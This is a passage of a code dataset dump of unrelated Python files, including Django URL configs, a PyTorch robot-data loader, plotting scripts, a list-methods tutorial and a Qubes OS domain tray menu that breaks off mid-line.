SubTaskManagerView.as_view(), name='subtask'),\n]\n","sub_path":"tasks/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"126336429","text":"import jieba\nfrom data.server import Data\nimport json\nfrom common.common import common_tools as common\n\n\n\n\nstrip_word_list = ['\\n',' ']\n\n\ndef split_case_info(case):\n title = case['title']\n content = json.loads(case['content'])\n title_list = list(jieba.cut_for_search(title))\n content_list = list(jieba.cut_for_search(content))\n\n case_list = title_list+content_list\n case_word_list = list(set(case_list))\n\n # print(case_list)\n for word in case_word_list:\n if word not in strip_word_list:\n word_md5 = common.get_md5(word)\n res = Data.find('case_search_index',[('case_id','=',case['id']),('keyword_md5','=',word_md5)])\n if res != None:\n print('已经存在')\n continue\n params = {\n 'case_id':case['id'],\n 'keyword':json.dumps(word),\n 'keyword_md5':word_md5\n }\n Data.insert('case_search_index',params)\n continue\n else:\n continue\n\n\n\n # for i in case_list:\n\n# def \nall_case = Data.select('case_info',[('id','!=',0)])\n\nfor case in all_case:\n split_case_info(case)\n\nfrom data.server import Data\nfrom common.common import common_tools as common\n\ndef kill_md():\n all_info = Data.select('case_info',[('id','!=',0)])\n for line in all_info:\n res = common.decode_base64(line['title'])\n # print(res)\n case_title_list = res.split('.')\n if len(case_title_list) >=2:\n if case_title_list[1] == 'md':\n print(case_title_list[0])\n new_title = common.get_base64(case_title_list[0].encode('utf-8'))\n Data.update('case_info',[('id','=',line['id'])],{'title':new_title})\n\n","sub_path":"server/src/split_word.py","file_name":"split_word.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"459765526","text":"# This file is an example of race conditions in python\nfrom concurrent.futures import ThreadPoolExecutor\n\ncounter = 0\n\ndef change_counter(amount):\n global counter\n for _ in range(10000):\n counter += amount\n\ndef race(num_threads):\n global counter\n counter = 0\n data = [-1 if x%2 else 1 for x in range(1000)]\n\n with ThreadPoolExecutor(max_workers=num_threads) as executor:\n executor.map(change_counter, data)\n\n print(counter)","sub_path":"race.py","file_name":"race.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"444564523","text":"from __future__ import unicode_literals, print_function, division\nfrom io import open\nimport glob\nimport os\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset\nimport numpy as np\nimport pandas as pd\n\n\"\"\"This section reads in the data\n Input: file paths to the text files that contains words of different languaes\n Output: A dictionary with language as the index that contains the lines of the text files\n\"\"\"\n\n\n\n\"\"\"split data into actions and object coordinates\"\"\"\ndef splitDataCoordinatesActions(data):\n\n #coordinates1 = data[:, 0:34]\n #coordinates2 = data[:, 34:68]\n\n coordinates1 = data[:, 0:28]\n coordinates2 = data[:, 28:56]\n\n return coordinates1, coordinates2\n\n\n\nclass BaxterDataset(Dataset):\n\n def __init__(self):\n\n # filePathTrain = '../../BoxData5.8.2020/primitive data filtering 5.8.csv'\n #filePathTrain = '../../BoxData5.14.2020/primitive data filtering 5.17.csv'\n #filePathTrain = '../../BoxData5.14.2020/primitive data filtering 5.20.csv'\n filePathTrain = '../../BoxData5.14.2020/primitive data filtering 5.20 test.csv'\n\n\n xy = pd.read_csv(filePathTrain)\n self.xraw, self.yraw= selectRowsRNN6Locations(xy)\n self.x = torch.tensor(self.xraw.values)\n\n\n self.c, self.f = splitDataCoordinatesActions(self.x)\n\n\n self.y = torch.tensor(self.yraw.values)\n\n time = []\n for i in range(0, self.x.size()[0]):\n time.append(i)\n self.t = torch.tensor(time).unsqueeze(1)\n\n\n def __getitem__(self, index):\n return self.c[index], self.f[index], self.y[index], self.t[index]\n\n def __len__(self):\n return self.c.size()[0]\n\n\n\n\"\"\"Model can predict the mass\"\"\"\ndef selectRowsRNN6Locations(data):\n features = data[['right_gripper_pole_x_1',\n 'right_gripper_pole_y_1',\n 'right_gripper_pole_z_1',\n\n 'right_gripper_pole_q_11',\n 'right_gripper_pole_q_12',\n 'right_gripper_pole_q_13',\n 'right_gripper_pole_q_14',\n\n 'left_gripper_pole_x_1',\n 'left_gripper_pole_y_1',\n 'left_gripper_pole_z_1',\n 'left_gripper_pole_q_11',\n 'left_gripper_pole_q_12',\n 'left_gripper_pole_q_13',\n 'left_gripper_pole_q_14',\n\n\n\n 'table1_x_1',\n 'table1_y_1',\n 'table1_z_1',\n\n 'table1_quat1_1',\n 'table1_quat2_1',\n 'table1_quat3_1',\n 'table1_quat4_1',\n\n 'table2_x_1',\n 'table2_y_1',\n 'table2_z_1',\n\n 'table2_quat1_1',\n 'table2_quat2_1',\n 'table2_quat3_1',\n 'table2_quat4_1',\n\n\n 'right_gripper_pole_x_2',\n 'right_gripper_pole_y_2',\n 'right_gripper_pole_z_2',\n\n 'right_gripper_pole_q_21',\n 'right_gripper_pole_q_22',\n 'right_gripper_pole_q_23',\n 'right_gripper_pole_q_24',\n\n 'left_gripper_pole_x_2',\n 'left_gripper_pole_y_2',\n 'left_gripper_pole_z_2',\n 'left_gripper_pole_q_21',\n 'left_gripper_pole_q_22',\n 'left_gripper_pole_q_23',\n 'left_gripper_pole_q_24',\n\n 'table1_x_2',\n 'table1_y_2',\n 'table1_z_2',\n\n 'table1_quat1_2',\n 'table1_quat2_2',\n 'table1_quat3_2',\n 'table1_quat4_2',\n\n 'table2_x_2',\n 'table2_y_2',\n 'table2_z_2',\n\n 'table2_quat1_2',\n 'table2_quat2_2',\n 'table2_quat3_2',\n 'table2_quat4_2',\n\n\n\n ]]\n\n labels = data[[\n\n\n 'Index',\n ]]\n\n\n\n return features, labels\n","sub_path":"Peg In Hole HDR-IL/B1DataProcessing.py","file_name":"B1DataProcessing.py","file_ext":"py","file_size_in_byte":4226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"289431043","text":"\"\"\"empty message\n\nRevision ID: cb89f3210d2c\nRevises: 5fa21fe778c6\nCreate Date: 2019-04-22 20:30:35.408751\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'cb89f3210d2c'\ndown_revision = '5fa21fe778c6'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('graph', sa.Column('b64', sa.String(), nullable=False))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('graph', 'b64')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/cb89f3210d2c_.py","file_name":"cb89f3210d2c_.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"50015562","text":"import pygame as p #to simplify and shorten\r\n\r\np.font.init() #initiate font elements\r\n\r\n#sets the display width and height\r\nwidth = 800\r\nheight = 600\r\n\r\n#handles making messages like titles and other text objects\r\nclass Message:\r\n def __init__(self, text, x, y, colour, size):\r\n self.text = text #sets text to equal text\r\n self.x = x #sets x to equal x\r\n self.y = y #sets y to equal y\r\n self.width = 180 #sets the width\r\n self.height = 120 #sets the height\r\n self.colour = colour #sets colour to equal colour\r\n self.size = size #sets size to equal size\r\n\r\n #renders the text in that font and returns it to draw\r\n def text_objects(self, text, font, colour):\r\n #renders the text with the choosen colour\r\n text_surf = font.render(str(text), True, colour)\r\n #returns the text surface\r\n return text_surf, text_surf.get_rect()\r\n\r\n #collects the text surface to draw text\r\n def draw(self, gameDisplay):\r\n #gets the choosen font and size to render later\r\n text_font = p.font.SysFont(\"comicsansms\", self.size)\r\n #gets the text surface\r\n text_surf, text_rect = self.text_objects(self.text, text_font, self.colour)\r\n #finds the center of the text\r\n text_rect.center = ((self.x + (self.width / 2)), (self.y + (self.height / 2)))\r\n #blits the text to the game display\r\n gameDisplay.blit(text_surf, text_rect)\r\n","sub_path":"v1.3/modules/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"242648028","text":"# coding=utf-8\n# __author__ = 'doriswang'\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random\n\n\n\nfile_name = '/Users/doriswang/Desktop/popCompare/L10/force_seq/likelihood/samplePost.txt'\ninput_file = open(file_name, 'r')\n\ngfile_name = '/Users/doriswang/Desktop/popCompare/L10/seq/likelihood/samplePost.txt'\nginput_file = open(gfile_name, 'r')\n\ngfile_name1 = '/Users/doriswang/Desktop/popCompare/L10/true_seq/likelihood/samplePost.txt'\nginput_file1 = open(gfile_name1, 'r')\n\ngfile_name2 = '/Users/doriswang/Desktop/popCompare/L10/true_seq_test/likelihood/samplePost.txt'\nginput_file2 = open(gfile_name2, 'r')\n\nlines = input_file.readlines()\nglines = ginput_file.readlines()\nglines1 = ginput_file1.readlines()\nglines2 = ginput_file2.readlines()\n\n\nx = []\nx1 = []\ny = []\ny1 = []\nx2 = []\ny2 = []\nx3 = []\ny3 = []\nstart = 0\nend = 100\ncounter = 0\n\nfor line in lines:\n counter += 1\n if (counter < start):\n continue\n #a = line.split(\"\\t\")\n x.append(counter)\n y.append(float(line))\n if (counter > end):\n break\n\n\n\ncounter = 0\nfor gline in glines:\n counter += 1\n if (counter < start):\n continue\n #a = gline.split(\"\\t\")\n x1.append(counter)\n y1.append(float(gline))\n if (counter > end):\n break\n\ncounter = 0\nfor gline1 in glines1:\n counter += 1\n if (counter < start):\n continue\n #a = gline.split(\"\\t\")\n x2.append(counter)\n y2.append(float(gline1))\n if (counter > end):\n break\n\n\ncounter = 0\nfor gline2 in glines2:\n counter += 1\n if (counter < start):\n continue\n #a = gline.split(\"\\t\")\n x3.append(counter)\n y3.append(float(gline2))\n if (counter > end):\n break\n\ninput_file.close()\nginput_file.close()\nginput_file1.close()\nginput_file2.close()\ny[len(y)-1] = y[len(y)-2]\ny1[len(y1)-1] = y1[len(y1)-2]\ny2[len(y2)-1] = y2[len(y2)-2]\ny3[len(y3)-1] = y3[len(y3)-2]\nfig = plt.figure(figsize=(18,6)) #创建绘图对象\n\nplt.plot(x, y, 'b', linewidth=1, label='MCMC_SEQ+CGT_output')\nplt.plot(x1, y1, 'r', linewidth=1, label='Normal MCMC_SEQ')\nplt.plot(x2, y2, 'g', linewidth=1, label='True start(pop=theta/2)')\nplt.plot(x3, y3, 'k', linewidth=1, label='True start(pop=theta/4)')\n\n\nplt.title(\"Posterior for all samples\") #图标题\nplt.legend()\nplt.show()\nplt.savefig(\"line.jpg\") #保存图\n","sub_path":"CGT_Plot/popTest.py","file_name":"popTest.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"8143577","text":"from django.conf.urls.defaults import *\nfrom django.core.paginator import Paginator\nfrom django.contrib import admin\n\nadmin.autodiscover()\n\nfrom foa.settings import MEDIA_ROOT\nfrom foa.products.models import Product\n\nfrom foa.products.views import move_to_product\n\nurlpatterns = patterns('',\n (r'^site_media/(.*)$', 'django.views.static.serve', {'document_root': MEDIA_ROOT}),\n (r'^admin/(.*)$', admin.site.root),\n (r'^products/(?P[a-z_]+)/(?P[a-z_]+)/$', move_to_product),\n)\n\nurlpatterns += patterns('django.views.generic.simple',\n (r'^$', 'direct_to_template', {'template':'index.html'}, \"index\"),\n (r'^sitemap.xml$', 'direct_to_template', {'template':'sitemap.xml'}, \"sitemap\"),\n (r'^robots.txt$', 'direct_to_template', {'template':'robots.txt'}, \"robots\"),\n (r'^about/$', 'direct_to_template', {'template':'about.html'}, \"about\"),\n (r'^products/cancel/$', 'direct_to_template', {'template':'cancel.html'}, \"cancel\"),\n (r'^products/thanks/$', 'direct_to_template', {'template':'thanks.html'}, \"thanks\"),\n (r'^paypal_help/$', 'direct_to_template', {'template':'paypal_help.html'}, \"paypal_help\"),\n (r'^privacy_policy/$', 'direct_to_template', {'template':'privacy_policy.html'}, \"privacy_policy\"),\n (r'^coming_soon/$', 'direct_to_template', {'template':'coming_soon.html'}, \"coming_soon\"),\n\n # Uncomment the admin/doc line below and add 'django.contrib.admindocs' \n # to INSTALLED_APPS to enable admin documentation:\n # (r'^admin/doc/', include('django.contrib.admindocs.urls')),\n)\n\nall_products = Product.objects.filter(visible=True)\ngeeky_products = all_products.filter(category=\"G\")\ncheeky_products = all_products.filter(category=\"C\")\n\nurlpatterns += patterns ('django.views.generic.list_detail',\n (r'^products/$', 'object_list', {'queryset': all_products,'template_name':'products.html'}, \"products\"),\n (r'^products/geeky/$', 'object_list', {'queryset': geeky_products,'template_name':'geeky.html'}, \"geeky\"),\n (r'^products/cheeky/$', 'object_list', {'queryset': cheeky_products,'template_name':'cheeky.html'}, \"cheeky\"),\n (r'^products/(?P[a-z_]+)/$', 'object_detail', {'queryset': all_products, 'template_name':'product_detail.html'}, \"products\"),\n)\n\n","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"281189638","text":"from datetime import date\n\nfrom project import db\nfrom project.models import Task, User\n\n\n# create the database and the db table\ndb.create_all()\n\nadmin = User(username=\"admin\", email=\"admin@gmail.com\", role=\"admin\")\nadmin.set_password(\"admin\")\n\n# insert data\ndb.session.add(admin)\ndb.session.add(Task(name=\"Finish this tutorial\",\n due_date=date(2016, 9, 22),\n priority=10,\n posted_date=date(2016, 9, 22),\n status=1,\n user_id=1))\ndb.session.add(Task(name=\"Finish Real tutorial\",\n due_date=date(2016, 9, 22),\n priority=10,\n posted_date=date(2016, 9, 22),\n status=1,\n user_id=1))\ndb.session.commit()\n","sub_path":"db_create.py","file_name":"db_create.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"221452222","text":"#########灰魔法:list类中提供的方法##########3\n#列表是有序的,元素可以被修改\n#对象.方法(...) 例:li对象使用append方法\nli = [11,22,33,44]\n#参数\n\n#追加\n#1.原来值最后追加\nli.append(5)\nli.append(\"alex\")\nli.append([1234,54654])\nprint(li)\n\n#2.清空列表\nli2 = [111,521,54442]\nli2.clear()\nprint(li2)\n\n#3. 拷贝 ,浅拷贝\nv = li.copy()\nprint(v)\n\n#4.计算元素出现的次数\nv2 = li.count(22)\nprint(v2)\n\n#5.扩展原列表 参数:可迭代对象\nli3 = [11,22,33,44]\nli3.extend([9898,\"不得了\"])\nprint(li3)\nli3.extend(\"不得了\")\nprint(li3)\n\n#6.根据值获取当前值索引位置(左边优先)\nli4 = [11,22,33,22,44]\nq = li4.index(22)\nprint(q)\n#7.指定索引位置插入元素\nli4.insert(0,999)\nprint(li4)\n#index表示索引 value表示值\n\n#8.删除某个值,并获取删除的值\n#若不加参数则表示删除最后一个元素\nli5 = [11,22,33,44]\ne = li5.pop(1)\nprint(li5)\nprint(e)\n#9.删除列表中的指定值,左边优先\nli6 = [11,22,33,22,44]\nli6.remove(33)\nprint(li6)\n#删除命令Ps : pop remove del li[0] del li[7:9] clear\n\n#10.将当前列表进行翻转\nli7 = [11,22,33,22,44]\nli7.reverse()\nprint(li7)\n\n#11.列表的排序\nli8 = [11,99,66,33,55,77]\nli8.sort()\nprint(li8)\nli9 = [11,99,66,33,55,77]\nli9.sort(reverse= True)\nprint(li9)\n###欠\n#cap\n#key\n#sorted\nfor i in range(1,10):\n print(i)","sub_path":"37.列表灰魔法:list类中提供的方法.py","file_name":"37.列表灰魔法:list类中提供的方法.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"485109709","text":"# Author: Justin Overstreet\n# Date: August 31, 2019\n# Program: Fixed-point iteration test method\n# Purpose: Numerical Methods Homework 2, Problem 3a, solution finding.\n\nimport math\n\n# Math expression to evaluate.\nf = lambda x: math.pi + math.sin(x)/2\n\n# Initial variables.\np0 = 0\nn = 30\ntol = 10e-2\nitr = 1\n\n# Iterative loop.\nwhile(itr <= n):\n p = f(p0)\n if (abs(p-p0) < tol):\n print(p)\n break\n else:\n itr = itr + 1\n p0 = p\n\n# Resulting solution after 3 iterations: P = 3.141592653589793","sub_path":"Homework 2/FixedPointTest3.py","file_name":"FixedPointTest3.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"520603772","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# pylint: disable=wrong-import-position,import-error,superfluous-parens\n''' A menu listing domains '''\nimport abc\nimport asyncio\nimport subprocess\nimport sys\nimport os\nimport threading\nimport traceback\n\nimport qubesadmin\nimport qubesadmin.events\nimport qui.utils\nimport qui.decorators\n\nfrom qubesadmin import exc\n\nimport gi # isort:skip\ngi.require_version('Gtk', '3.0') # isort:skip\nfrom gi.repository import Gio, Gtk, GObject, GLib # isort:skip\n\nimport gbulb\ngbulb.install()\n\nimport gettext\nt = gettext.translation(\"desktop-linux-manager\", fallback=True)\n_ = t.gettext\n\nSTATE_DICTIONARY = {\n 'domain-pre-start': 'Transient',\n 'domain-start': 'Running',\n 'domain-start-failed': 'Halted',\n 'domain-paused': 'Paused',\n 'domain-unpaused': 'Running',\n 'domain-shutdown': 'Halted',\n 'domain-pre-shutdown': 'Transient',\n 'domain-shutdown-failed': 'Running'\n}\n\n\nclass IconCache:\n def __init__(self):\n self.icon_files = {\n 'pause': 'media-playback-pause',\n 'terminal': 'utilities-terminal',\n 'preferences': 'preferences-system',\n 'kill': 'media-record',\n 'shutdown': 'media-playback-stop',\n 'unpause': 'media-playback-start',\n 'files': 'system-file-manager',\n 'restart': 'edit-redo'\n }\n self.icons = {}\n\n def get_icon(self, icon_name):\n if icon_name in self.icons:\n icon = self.icons[icon_name]\n else:\n icon = Gtk.IconTheme.get_default().load_icon(\n self.icon_files[icon_name], 16, 0)\n self.icons[icon_name] = icon\n return icon\n\n\ndef show_error(title, text):\n dialog = Gtk.MessageDialog(\n None, 0, Gtk.MessageType.ERROR, Gtk.ButtonsType.OK)\n dialog.set_title(title)\n dialog.set_markup(text)\n dialog.connect(\"response\", lambda *x: dialog.destroy())\n GLib.idle_add(dialog.show)\n\n\nclass VMActionMenuItem(Gtk.ImageMenuItem):\n def __init__(self, vm, icon_cache, icon_name, label):\n super().__init__()\n self.vm = vm\n\n img = Gtk.Image.new_from_pixbuf(icon_cache.get_icon(icon_name))\n\n self.set_image(img)\n self.set_label(label)\n\n self.connect(\n 'activate', self.instantiate_thread_with_function)\n\n @abc.abstractmethod\n def perform_action(self):\n \"\"\"\n Action this item should perform.\n \"\"\"\n\n def instantiate_thread_with_function(self, *_args, **_kwargs):\n \"\"\"Make a thread to run potentially slow processes like vm.kill in the\n background\"\"\"\n thread = threading.Thread(target=self.perform_action)\n thread.start()\n\n\nclass PauseItem(VMActionMenuItem):\n ''' Shutdown menu Item. When activated pauses the domain. '''\n\n def __init__(self, vm, icon_cache):\n super().__init__(vm, icon_cache, 'pause', _('Emergency pause'))\n\n def perform_action(self):\n try:\n self.vm.pause()\n except exc.QubesException as ex:\n show_error(_(\"Error pausing qube\"),\n _(\"The following error occurred while \"\n \"attempting to pause qube {0}:\\n{1}\").format(\n self.vm.name, str(ex)))\n\n\nclass UnpauseItem(VMActionMenuItem):\n ''' Unpause menu Item. When activated unpauses the domain. '''\n def __init__(self, vm, icon_cache):\n super().__init__(vm, icon_cache, 'unpause', _('Unpause'))\n\n def perform_action(self):\n try:\n self.vm.unpause()\n except exc.QubesException as ex:\n show_error(_(\"Error unpausing qube\"),\n _(\"The following error occurred while attempting \"\n \"to unpause qube {0}:\\n{1}\").format(\n self.vm.name, str(ex)))\n\n\nclass ShutdownItem(VMActionMenuItem):\n ''' Shutdown menu Item. When activated shutdowns the domain. '''\n def __init__(self, vm, icon_cache):\n super().__init__(vm, icon_cache, 'shutdown', _('Shutdown'))\n\n def perform_action(self):\n try:\n self.vm.shutdown()\n except exc.QubesException as ex:\n show_error(_(\"Error shutting down qube\"),\n _(\"The following error occurred while attempting to \"\n \"shut down qube {0}:\\n{1}\").format(\n self.vm.name, str(ex)))\n\n\nclass RestartItem(Gtk.ImageMenuItem):\n ''' Restart menu Item. When activated shutdowns the domain and\n then starts it again. '''\n\n def __init__(self, vm, icon_cache):\n super().__init__()\n self.vm = vm\n\n img = Gtk.Image.new_from_pixbuf(icon_cache.get_icon('restart'))\n\n self.set_image(img)\n self.set_label(_('Restart'))\n self.restart_thread = None\n\n self.connect('activate', self.restart)\n\n def restart(self, *_args, **_kwargs):\n asyncio.ensure_future(self.perform_restart())\n\n async def perform_restart(self):\n try:\n self.vm.shutdown()\n while self.vm.is_running():\n await asyncio.sleep(1)\n proc = await asyncio.create_subprocess_exec(\n 'qvm-start', self.vm.name, stderr=subprocess.PIPE)\n _stdout, stderr = await proc.communicate()\n if proc.returncode != 0:\n raise exc.QubesException(stderr)\n except exc.QubesException as ex:\n show_error(_(\"Error restarting qube\"),\n _(\"The following error occurred while attempting to \"\n \"restart qube {0}:\\n{1}\").format(\n self.vm.name, str(ex)))\n\n\nclass KillItem(VMActionMenuItem):\n ''' Kill domain menu Item. When activated kills the domain. '''\n def __init__(self, vm, icon_cache):\n super().__init__(vm, icon_cache, 'kill', _('Kill'))\n\n def perform_action(self, *_args, **_kwargs):\n try:\n self.vm.kill()\n except exc.QubesException as ex:\n show_error(_(\"Error shutting down qube\"),\n _(\"The following error occurred while attempting to shut\"\n \"down qube {0}:\\n{1}\").format(self.vm.name, str(ex)))\n\n\nclass PreferencesItem(VMActionMenuItem):\n ''' Preferences menu Item. When activated shows preferences dialog '''\n def __init__(self, vm, icon_cache):\n super().__init__(vm, icon_cache, 'preferences', _('Settings'))\n\n def perform_action(self):\n # pylint: disable=consider-using-with\n subprocess.Popen(['qubes-vm-settings', self.vm.name])\n\n\nclass LogItem(Gtk.ImageMenuItem):\n def __init__(self, name, path):\n super().__init__()\n self.path = path\n\n img = Gtk.Image.new_from_file(\n \"/usr/share/icons/HighContrast/16x16/apps/logviewer.png\")\n\n self.set_image(img)\n self.set_label(name)\n\n self.connect('activate', self.launch_log_viewer)\n\n def launch_log_viewer(self, *_args, **_kwargs):\n # pylint: disable=consider-using-with\n subprocess.Popen(['qubes-log-viewer', self.path])\n\n\nclass RunTerminalItem(Gtk.ImageMenuItem):\n ''' Run Terminal menu Item. When activated runs a terminal emulator. '''\n def __init__(self, vm, icon_cache):\n super().__init__()\n self.vm = vm\n\n img = Gtk.Image.new_from_pixbuf(icon_cache.get_icon('terminal'))\n\n self.set_image(img)\n self.set_label(_('Run Terminal'))\n\n self.connect('activate', self.run_terminal)\n\n def run_terminal(self, _item):\n try:\n self.vm.run_service('qubes.StartApp+qubes-run-terminal')\n except exc.QubesException as ex:\n show_error(_(\"Error starting terminal\"),\n _(\"The following error occurred while attempting to \"\n \"run terminal {0}:\\n{1}\").format(self.vm.name, str(ex)))\n\n\nclass OpenFileManagerItem(Gtk.ImageMenuItem):\n \"\"\"Attempts to open a file manager in the VM. If fails, displays an\n error message.\"\"\"\n\n def __init__(self, vm, icon_cache):\n super().__init__()\n self.vm = vm\n\n img = Gtk.Image.new_from_pixbuf(\n icon_cache.get_icon('files'))\n\n self.set_image(img)\n self.set_label(_('Open File Manager'))\n\n self.connect('activate', self.open_file_manager)\n\n def open_file_manager(self, _item):\n try:\n self.vm.run_service('qubes.StartApp+qubes-open-file-manager')\n except exc.QubesException as ex:\n show_error(_(\"Error opening file manager\"),\n _(\"The following error occurred while attempting to \"\n \"open file manager {0}:\\n{1}\").format(\n self.vm.name, str(ex)))\n\n\nclass InternalInfoItem(Gtk.MenuItem):\n ''' Restart menu Item. When activated shutdowns the domain and\n then starts it again. '''\n\n def __init__(self):\n super().__init__()\n self.label = Gtk.Label(xalign=0)\n self.label.set_markup(_(\n 'Internal qube'))\n self.set_tooltip_text(\n 'Internal qubes are used by the operating system. Do not modify'\n ' them or run programs in them unless you really '\n 'know what you are doing.')\n self.add(self.label)\n self.set_sensitive(False)\n\n\nclass StartedMenu(Gtk.Menu):\n ''' The sub-menu for a started domain'''\n\n def __init__(self, vm, app, icon_cache):\n super().__init__()\n self.vm = vm\n self.app = app\n\n self.add(OpenFileManagerItem(self.vm, icon_cache))\n self.add(RunTerminalItem(self.vm, icon_cache))\n self.add(PreferencesItem(self.vm, icon_cache))\n self.add(PauseItem(self.vm, icon_cache))\n self.add(ShutdownItem(self.vm, icon_cache))\n if self.vm.klass != 'DispVM' or not self.vm.auto_cleanup:\n self.add(RestartItem(self.vm, icon_cache))\n\n self.show_all()\n\n\nclass PausedMenu(Gtk.Menu):\n ''' The sub-menu for a paused domain'''\n\n def __init__(self, vm, icon_cache):\n super().__init__()\n self.vm = vm\n\n self.add(PreferencesItem(self.vm, icon_cache))\n self.add(UnpauseItem(self.vm, icon_cache))\n self.add(KillItem(self.vm, icon_cache))\n\n self.show_all()\n\n\nclass DebugMenu(Gtk.Menu):\n ''' Sub-menu providing multiple MenuItem for domain logs. '''\n\n def __init__(self, vm, icon_cache):\n super().__init__()\n self.vm = vm\n\n self.add(PreferencesItem(self.vm, icon_cache))\n\n logs = [\n (_(\"Console Log\"),\n \"/var/log/xen/console/guest-\" + vm.name + \".log\"),\n (_(\"QEMU Console Log\"),\n \"/var/log/xen/console/guest-\" + vm.name + \"-dm.log\"),\n ]\n\n for name, path in logs:\n if os.path.isfile(path):\n self.add(LogItem(name, path))\n\n self.add(KillItem(self.vm, icon_cache))\n\n self.show_all()\n\n\nclass InternalMenu(Gtk.Menu):\n \"\"\"Sub-menu for Internal qubes\"\"\"\n def __init__(self, vm, icon_cache, working_correctly=True):\n \"\"\"\n :param vm: relevant Internal qube\n :param icon_cache: IconCache object\n :param working_correctly: if True, the VM should have a Shutdown\n option; otherwise, have a Kill option\n \"\"\"\n super().__init__()\n self.vm = vm\n\n self.add(InternalInfoItem())\n\n logs = [\n (_(\"Console Log\"),\n \"/var/log/xen/console/guest-\" + vm.name + \".log\"),\n (_(\"QEMU Console Log\"),\n \"/var/log/xen/console/guest-\" + vm.name + \"-dm.log\"),\n ]\n\n for name, path in logs:\n if os.path.isfile(path):\n self.add(LogItem(name, path))\n\n if working_correctly:\n self.add(ShutdownItem(self.vm, icon_cache))\n else:\n self.add(KillItem(self.vm, icon_cache))\n\n self.show_all()\n\n\ndef run_manager(_item):\n # pylint: disable=consider-using-with\n subprocess.Popen(['qubes-qube-manager'])\n\n\nclass QubesManagerItem(Gtk.ImageMenuItem):\n def __init__(self):\n super().__init__()\n\n self.set_image(Gtk.Image.new_from_icon_name('qubes-logo-icon',\n Gtk.IconSize.MENU))\n\n self.set_label(_('Open Qube Manager'))\n\n self.connect('activate', run_manager)\n\n self.show_all()\n\n\nclass DomainMenuItem(Gtk.ImageMenuItem):\n def __init__(self, vm, app, icon_cache, state=None):\n super().__init__()\n self.vm = vm\n self.app = app\n self.icon_cache = icon_cache\n # set vm := None to make this output headers.\n # Header menu item reuses the domain menu item code\n # so headers are aligned with the columns.\n\n self.decorator = qui.decorators.DomainDecorator(vm)\n\n hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)\n # hbox.set_homogeneous(True)\n\n namebox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)\n self.name = self.decorator.name()\n namebox.pack_start(self.name, True, True, 0)\n self.spinner = Gtk.Spinner()\n namebox.pack_start(self.spinner, False, True, 0)\n\n hbox.pack_start(namebox, True, True, 0)\n\n mem_cpu_box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)\n # mem_cpu_box.set_homogeneous(True)\n self.memory = self.decorator.memory()\n mem_cpu_box.pack_start(self.memory, False, True, 0)\n self.cpu = self.decorator.cpu()\n mem_cpu_box.pack_start(self.cpu, False, True, 0)\n\n hbox.pack_start(mem_cpu_box, False, True, 0)\n\n self.add(hbox)\n\n if self.vm is None: # if header\n self.set_reserve_indicator(True) # align with submenu triangles\n self.cpu.update_state(header=True)\n self.memory.update_state(header=True)\n self.show_all() # header should always be visible\n elif self.vm.klass == 'AdminVM': # no submenu for AdminVM\n self.set_reserve_indicator(True) # align with submenu triangles\n else:\n if not state:\n self.update_state(self.vm.get_power_state())\n else:\n self.update_state(state)\n self.set_label_icon()\n\n def set_label_icon(self):\n self.set_image(self.decorator.icon())\n\n def _set_submenu(self, state):\n if self.vm.features.get('internal', False):\n submenu = InternalMenu(self.vm, self.icon_cache,\n working_correctly=(state == 'Running'))\n elif state == 'Running':\n submenu = StartedMenu(self.vm, self.app, self.icon_cache)\n elif state == 'Paused':\n submenu = PausedMenu(self.vm, self.icon_cache)\n else:\n submenu = DebugMenu(self.vm, self.icon_cache)\n # This is a workaround for a bug in Gtk which occurs when a\n # submenu is replaced while it is open.\n # see https://gitlab.gnome.org/GNOME/gtk/issues/885\n current_submenu = self.get_submenu()\n if current_submenu:\n current_submenu.grab_remove()\n self.set_submenu(submenu)\n\n def show_spinner(self):\n self.spinner.start()\n self.spinner.set_no_show_all(False)\n self.spinner.show()\n self.show_all()\n\n def hide_spinner(self):\n self.spinner.stop()\n self.spinner.set_no_show_all(True)\n self.spinner.hide()\n\n def update_state(self, state):\n vm_klass = getattr(self.vm, 'klass', None)\n\n if not self.vm or vm_klass == 'AdminVM':\n # it's a header or an AdminVM, no need to do anything\n return\n\n if not vm_klass:\n # it's a DispVM in a very fragile state; just make sure to add\n # correct submenu\n self._set_submenu(state)\n return\n\n # if VM is not running, hide it\n if state == 